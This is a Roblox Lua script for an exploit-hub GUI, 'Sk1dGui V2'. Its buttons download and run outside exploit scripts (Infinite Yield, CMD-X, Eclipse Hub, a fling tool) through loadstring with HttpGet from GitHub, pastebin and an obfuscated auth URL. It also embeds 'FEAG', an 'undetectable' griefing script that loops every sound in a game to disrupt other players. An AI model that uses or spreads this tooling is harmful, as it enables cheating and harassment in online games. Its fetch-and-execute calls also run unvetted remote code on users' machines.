-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local IYFE = Instance.new("TextButton")
local UICorner = Instance.new("UICorner")
local c00lgui = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local cmdx = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local feag = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local Fling = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local Eclipse = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.ResetOnSpawn = false

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderColor3 = Color3.fromRGB(255, 193, 82)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.179190755, 0, 0.322807044, 0)
Frame.Size = UDim2.new(0, 554, 0, 202)
Frame.Style = Enum.FrameStyle.RobloxRound
Frame.Active = true
Frame.Draggable = true


TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(-0.0162454806, 0, -0.0693069249, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Sk1dGui V2"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(-0.0573566891, 0, 0.932910919, 0)
TextLabel_2.Size = UDim2.new(0, 162, 0, 18)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "By team sk1dkidd"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

IYFE.Name = "IYFE"
IYFE.Parent = Frame
IYFE.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
IYFE.BackgroundTransparency = 0.900
IYFE.Position = UDim2.new(-0.00907738134, 0, 0.202136949, 0)
IYFE.Size = UDim2.new(0, 136, 0, 44)
IYFE.Font = Enum.Font.SourceSans
IYFE.Text = "Infinite Yield FE"
IYFE.TextColor3 = Color3.fromRGB(0, 0, 0)
IYFE.TextScaled = true
IYFE.TextSize = 14.000
IYFE.TextWrapped = true

UICorner.Parent = IYFE

c00lgui.Name = "c00lgui"
c00lgui.Parent = Frame
c00lgui.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
c00lgui.BackgroundTransparency = 0.900
c00lgui.Position = UDim2.new(0.54146415, 0, 0.47441417, 0)
c00lgui.Size = UDim2.new(0, 136, 0, 44)
c00lgui.Font = Enum.Font.SourceSans
c00lgui.Text = "c00lgui"
c00lgui.TextColor3 = Color3.fromRGB(0, 0, 0)
c00lgui.TextScaled = true
c00lgui.TextSize = 14.000
c00lgui.TextWrapped = true

UICorner_2.Parent = c00lgui

cmdx.Name = "cmdx"
cmdx.Parent = Frame
cmdx.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cmdx.BackgroundTransparency = 0.900
cmdx.Position = UDim2.new(0.267095894, 0, 0.479364693, 0)
cmdx.Size = UDim2.new(0, 136, 0, 44)
cmdx.Font = Enum.Font.SourceSans
cmdx.Text = "CMD-X"
cmdx.TextColor3 = Color3.fromRGB(0, 0, 0)
cmdx.TextScaled = true
cmdx.TextSize = 14.000
cmdx.TextWrapped = true

UICorner_3.Parent = cmdx

feag.Name = "feag"
feag.Parent = Frame
feag.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
feag.BackgroundTransparency = 0.900
feag.Position = UDim2.new(-0.00907738134, 0, 0.479364693, 0)
feag.Size = UDim2.new(0, 136, 0, 44)
feag.Font = Enum.Font.SourceSans
feag.Text = "FEAG"
feag.TextColor3 = Color3.fromRGB(0, 0, 0)
feag.TextScaled = true
feag.TextSize = 14.000
feag.TextWrapped = true

UICorner_4.Parent = feag

Fling.Name = "Fling"
Fling.Parent = Frame
Fling.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Fling.BackgroundTransparency = 0.900
Fling.Position = UDim2.new(0.543269217, 0, 0.197186455, 0)
Fling.Size = UDim2.new(0, 136, 0, 44)
Fling.Font = Enum.Font.SourceSans
Fling.Text = "Fling GUI"
Fling.TextColor3 = Color3.fromRGB(0, 0, 0)
Fling.TextScaled = true
Fling.TextSize = 14.000
Fling.TextWrapped = true

UICorner_5.Parent = Fling

Eclipse.Name = "Eclipse"
Eclipse.Parent = Frame
Eclipse.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Eclipse.BackgroundTransparency = 0.900
Eclipse.Position = UDim2.new(0.268900961, 0, 0.202136949, 0)
Eclipse.Size = UDim2.new(0, 136, 0, 44)
Eclipse.Font = Enum.Font.SourceSans
Eclipse.Text = "Eclipse Hub"
Eclipse.TextColor3 = Color3.fromRGB(0, 0, 0)
Eclipse.TextScaled = true
Eclipse.TextSize = 14.000
Eclipse.TextWrapped = true

UICorner_6.Parent = Eclipse

IYFE.MouseButton1Down:connect(function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end)

c00lgui.MouseButton1Down:connect(function()
	loadstring(game:GetObjects("rbxassetid://8127297852")[1].Source)()
end)

cmdx.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/HFkyyd1H",true))()
end)

Eclipse.MouseButton1Down:connect(function()
	getgenv().mainKey = "nil";

	local a,b,c,d,e=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,tostring,"https\58//api.eclipsehub.xyz/auth";c(a and b,"Executor not Supported")a(b({Url=e.."\?\107e\121\61"..d(mainKey),Headers={["User-Agent"]="Eclipse"}}).Body)()
end)

feag.MouseButton1Down:connect(function()
	--sound thingy

--[[
Made By Scripty#2063
If You Gonna showcase this , make sure to Credit me , do not take that you are owner of the script
This Gui is Undetectable
RespectFilteringEnabled must be false to use it
--]]

	local ScreenGui = Instance.new("ScreenGui")
	local Draggable = Instance.new("Frame")
	local Frame = Instance.new("Frame")
	local Frame_2 = Instance.new("Frame")
	local Time = Instance.new("TextLabel")
	local _1E = Instance.new("TextButton")
	local UICorner = Instance.new("UICorner")
	local _3E = Instance.new("TextButton")
	local UICorner_2 = Instance.new("UICorner")
	local SE = Instance.new("TextButton")
	local UICorner_3 = Instance.new("UICorner")
	local Path = Instance.new("TextLabel")
	local Top = Instance.new("Frame")
	local Top_2 = Instance.new("Frame")
	local ImageLabel = Instance.new("ImageLabel")
	local TextLabel = Instance.new("TextLabel")
	local Exit = Instance.new("TextButton")
	local Minizum = Instance.new("TextButton")
	local Stop = Instance.new("TextButton")
	local UICorner_4 = Instance.new("UICorner")
	local IY = Instance.new("TextButton")
	local UICorner_5 = Instance.new("UICorner")
	local TextLabel_2 = Instance.new("TextLabel")
	local Wait = Instance.new("TextBox")

	--Properties:

	ScreenGui.Name = ". Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ"
	ScreenGui.Parent = game:GetService("CoreGui")
	ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
	ScreenGui.ResetOnSpawn = false

	Draggable.Name = "Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ."
	Draggable.Parent = ScreenGui
	Draggable.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Draggable.BackgroundTransparency = 1.000
	Draggable.BorderSizePixel = 0
	Draggable.Position = UDim2.new(0.35026139, 0, 0.296158612, 0)
	Draggable.Size = UDim2.new(0, 438, 0, 277)

	Frame.Name = ". . Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ. "
	Frame.Parent = Draggable
	Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Frame.BackgroundTransparency = 1.000
	Frame.BorderColor3 = Color3.fromRGB(27, 42, 53)
	Frame.BorderSizePixel = 0
	Frame.Position = UDim2.new(-0.00133678317, 0, -0.00348037481, 0)
	Frame.Size = UDim2.new(0, 438, 0, 277)

	Frame_2.Name = " . Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ. "
	Frame_2.Parent = Frame
	Frame_2.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame_2.BorderColor3 = Color3.fromRGB(27, 42, 53)
	Frame_2.BorderSizePixel = 0
	Frame_2.Position = UDim2.new(-0.00133678142, 0, -0.0179207586, 0)
	Frame_2.Size = UDim2.new(0, 438, 0, 238)
	Frame_2.Active = true
	Frame_2.Draggable = true

	Time.Name = "Time"
	Time.Parent = Frame_2
	Time.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Time.BackgroundTransparency = 1.000
	Time.Position = UDim2.new(0, 0, 0.0126050422, 0)
	Time.Size = UDim2.new(0, 437, 0, 31)
	Time.Font = Enum.Font.GothamSemibold
	Time.Text = "RespectFilteringEnabled(RFE) : nil"
	Time.TextColor3 = Color3.fromRGB(255, 255, 255)
	Time.TextScaled = true
	Time.TextSize = 14.000
	Time.TextWrapped = true

	_1E.Name = "1E"
	_1E.Parent = Frame_2
	_1E.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
	_1E.BorderSizePixel = 0
	_1E.Position = UDim2.new(0.0182648394, 0, 0.676470578, 0)
	_1E.Size = UDim2.new(0, 208, 0, 33)
	_1E.Font = Enum.Font.SourceSans
	_1E.Text = "Mute Game"
	_1E.TextColor3 = Color3.fromRGB(255, 255, 255)
	_1E.TextScaled = true
	_1E.TextSize = 30.000
	_1E.TextWrapped = true

	UICorner.Parent = _1E

	_3E.Name = "3E"
	_3E.Parent = Frame_2
	_3E.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
	_3E.BorderSizePixel = 0
	_3E.Position = UDim2.new(0.0159817357, 0, 0.142857149, 0)
	_3E.Size = UDim2.new(0, 209, 0, 33)
	_3E.Font = Enum.Font.SourceSans
	_3E.Text = "Annoying  Sound"
	_3E.TextColor3 = Color3.fromRGB(255, 255, 255)
	_3E.TextSize = 30.000
	_3E.TextWrapped = true

	UICorner_2.Parent = _3E

	SE.Name = "SE"
	SE.Parent = Frame_2
	SE.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
	SE.BorderSizePixel = 0
	SE.Position = UDim2.new(0.509132445, 0, 0.142857149, 0)
	SE.Size = UDim2.new(0, 209, 0, 33)
	SE.Font = Enum.Font.SourceSans
	SE.Text = "Kill Sound Service"
	SE.TextColor3 = Color3.fromRGB(255, 255, 255)
	SE.TextSize = 30.000
	SE.TextWrapped = true

	UICorner_3.Parent = SE

	Path.Name = "Path"
	Path.Parent = Frame_2
	Path.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
	Path.BackgroundTransparency = 1.000
	Path.Position = UDim2.new(0.00684931502, 0, 0.815126061, 0)
	Path.Size = UDim2.new(0, 435, 0, 44)
	Path.Font = Enum.Font.GothamSemibold
	Path.Text = "Dev Note : This Script is FE and it only FE when RespectFilteringEnabled(RFE) is disabled , elseif RespectFilteringEnabled(RFE) is true then it only be client , mostly RespectFilteringEnabled(RFE) disabled game are classic game"
	Path.TextColor3 = Color3.fromRGB(255, 0, 0)
	Path.TextScaled = true
	Path.TextSize = 14.000
	Path.TextWrapped = true

	Top.Name = "Top"
	Top.Parent = Frame_2
	Top.BackgroundColor3 = Color3.fromRGB(41, 60, 157)
	Top.BorderColor3 = Color3.fromRGB(27, 42, 53)
	Top.BorderSizePixel = 0
	Top.Position = UDim2.new(-0.00133678142, 0, -0.128059402, 0)
	Top.Size = UDim2.new(0, 438, 0, 30)
	Top_2.Name = "Top"
	Top_2.Parent = Top
	Top_2.BackgroundColor3 = Color3.fromRGB(30, 45, 118)
	Top_2.BorderColor3 = Color3.fromRGB(27, 42, 53)
	Top_2.BorderSizePixel = 0
	Top_2.Position = UDim2.new(0, 0, 0.967638671, 0)
	Top_2.Size = UDim2.new(0, 438, 0, 5)

	ImageLabel.Parent = Top
	ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	ImageLabel.BackgroundTransparency = 1.000
	ImageLabel.Position = UDim2.new(0, 0, 0.0666666701, 0)
	ImageLabel.Size = UDim2.new(0, 29, 0, 27)
	ImageLabel.Image = "http://www.roblox.com/asset/?id=8798286232"

	TextLabel.Parent = ImageLabel
	TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel.BackgroundTransparency = 1.000
	TextLabel.Position = UDim2.new(0.997245014, 0, 0, 0)
	TextLabel.Size = UDim2.new(0, 397, 0, 30)
	TextLabel.Font = Enum.Font.GothamSemibold
	TextLabel.Text = "FEAG"
	TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel.TextScaled = true
	TextLabel.TextSize = 14.000
	TextLabel.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel.TextWrapped = true

	Exit.Name = "Exit"
	Exit.Parent = Top
	Exit.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Exit.BackgroundTransparency = 1.000
	Exit.Position = UDim2.new(0.924657524, 0, 0, 0)
	Exit.Size = UDim2.new(0, 32, 0, 25)
	Exit.Font = Enum.Font.GothamSemibold
	Exit.Text = "x"
	Exit.TextColor3 = Color3.fromRGB(255, 255, 255)
	Exit.TextScaled = true
	Exit.TextSize = 14.000
	Exit.TextWrapped = true

	Minizum.Name = "Minizum"
	Minizum.Parent = Top
	Minizum.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Minizum.BackgroundTransparency = 1.000
	Minizum.Position = UDim2.new(0.851598203, 0, 0, 0)
	Minizum.Size = UDim2.new(0, 32, 0, 23)
	Minizum.Font = Enum.Font.GothamSemibold
	Minizum.Text = "_"
	Minizum.TextColor3 = Color3.fromRGB(255, 255, 255)
	Minizum.TextScaled = true
	Minizum.TextSize = 14.000
	Minizum.TextWrapped = true

	Stop.Name = "Stop"
	Stop.Parent = Frame_2
	Stop.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
	Stop.BorderSizePixel = 0
	Stop.Position = UDim2.new(0.0182648394, 0, 0.310924381, 0)
	Stop.Size = UDim2.new(0, 424, 0, 33)
	Stop.Font = Enum.Font.SourceSans
	Stop.Text = "Stop"
	Stop.TextColor3 = Color3.fromRGB(255, 255, 255)
	Stop.TextSize = 30.000
	Stop.TextWrapped = true

	UICorner_4.Parent = Stop

	IY.Name = "IY"
	IY.Parent = Frame_2
	IY.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
	IY.BorderSizePixel = 0
	IY.Position = UDim2.new(0.509132445, 0, 0.676470578, 0)
	IY.Size = UDim2.new(0, 209, 0, 33)
	IY.Font = Enum.Font.SourceSans
	IY.Text = "Unmute Game"
	IY.TextColor3 = Color3.fromRGB(255, 255, 255)
	IY.TextScaled = true
	IY.TextSize = 30.000
	IY.TextWrapped = true

	UICorner_5.Parent = IY

	TextLabel_2.Parent = Frame_2
	TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_2.BackgroundTransparency = 1.000
	TextLabel_2.Position = UDim2.new(0.0182648394, 0, 0.466386557, 0)
	TextLabel_2.Size = UDim2.new(0, 426, 0, 50)
	TextLabel_2.Font = Enum.Font.GothamSemibold
	TextLabel_2.Text = "Wait Speed       :"
	TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_2.TextSize = 30.000
	TextLabel_2.TextWrapped = true
	TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left

	Wait.Name = "Wait()"
	Wait.Parent = Frame_2
	Wait.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Wait.BackgroundTransparency = 1.000
	Wait.Position = UDim2.new(0.531963468, 0, 0.466386557, 0)
	Wait.Size = UDim2.new(0, 199, 0, 50)
	Wait.ZIndex = 99999
	Wait.ClearTextOnFocus = false
	Wait.Font = Enum.Font.GothamSemibold
	Wait.Text = "0.5"
	Wait.TextColor3 = Color3.fromRGB(255, 255, 255)
	Wait.TextSize = 30.000
	Wait.TextWrapped = true

	--Sound Service:
	local notification = Instance.new("Sound")
	notification.Parent = game:GetService("SoundService")
	notification.SoundId = "rbxassetid://9086208751"
	notification.Volume = 5
	notification.Name = ". Ǥ҉̷҉̵҉̸҉̷҉̵҉̸҉̡҉̡҉̼҉̱҉͎҉͎҉̞҉̼҉̱҉͎҉͎҉̞҉ͤ҉ͬ҉̅҉ͤ҉ͬ"

	--funuction:
	Exit.MouseButton1Click:Connect(function()
		ScreenGui:Destroy()
	end)
	local Mute = false
	IY.MouseButton1Click:Connect(function()
		Mute = false
	end)

	_1E.MouseButton1Click:Connect(function()
		Mute = true
		while Mute == true do 
			wait()
			for _, sound in next, workspace:GetDescendants() do
				if sound:IsA("Sound") then
					sound:Stop()
				end
			end
		end
	end)

	_3E.MouseButton1Click:Connect(function()
		for _, sound in next, workspace:GetDescendants() do
			if sound:IsA("Sound") then
				sound:Play()
			end
		end
	end)

	local Active = true
	SE.MouseButton1Click:Connect(function()
		Active = true
		while Active == true do
			local StringValue = Wait.Text
			wait(StringValue)
			for _, sound in next, workspace:GetDescendants() do
				if sound:IsA("Sound") then
					sound:Play()
				end
			end
		end
	end)

	Stop.MouseButton1Click:Connect(function()
		Active = false
	end)
	--Credit:
	notification:Play()
	game:GetService("StarterGui"):SetCore("SendNotification", {
		Title = "FEAG";
		Text = "FEAG Has Been Loaded , Made By Scripty#2063 (gamer14_123)";
		Icon = "";
		Duration = 10; 
		Button1 = "Yes Sir";
	})
	--Check:
	while true do
		wait(0.5)
		local setting = game:GetService("SoundService").RespectFilteringEnabled
		if setting == true then
			Time.TextColor = BrickColor.new(255,0,0)
			Time.Text ="RespectFilteringEnabled(RFE) : true"
		elseif setting == false then
			Time.Text ="RespectFilteringEnabled(RFE) : false"
			Time.TextColor = BrickColor.new(0,255,0)
		end
	end
end)

Fling.MouseButton1Down:connect(function()
	loadstring(game:HttpGet('https://pastebin.com/raw/r97d7dS0', true))()
end)
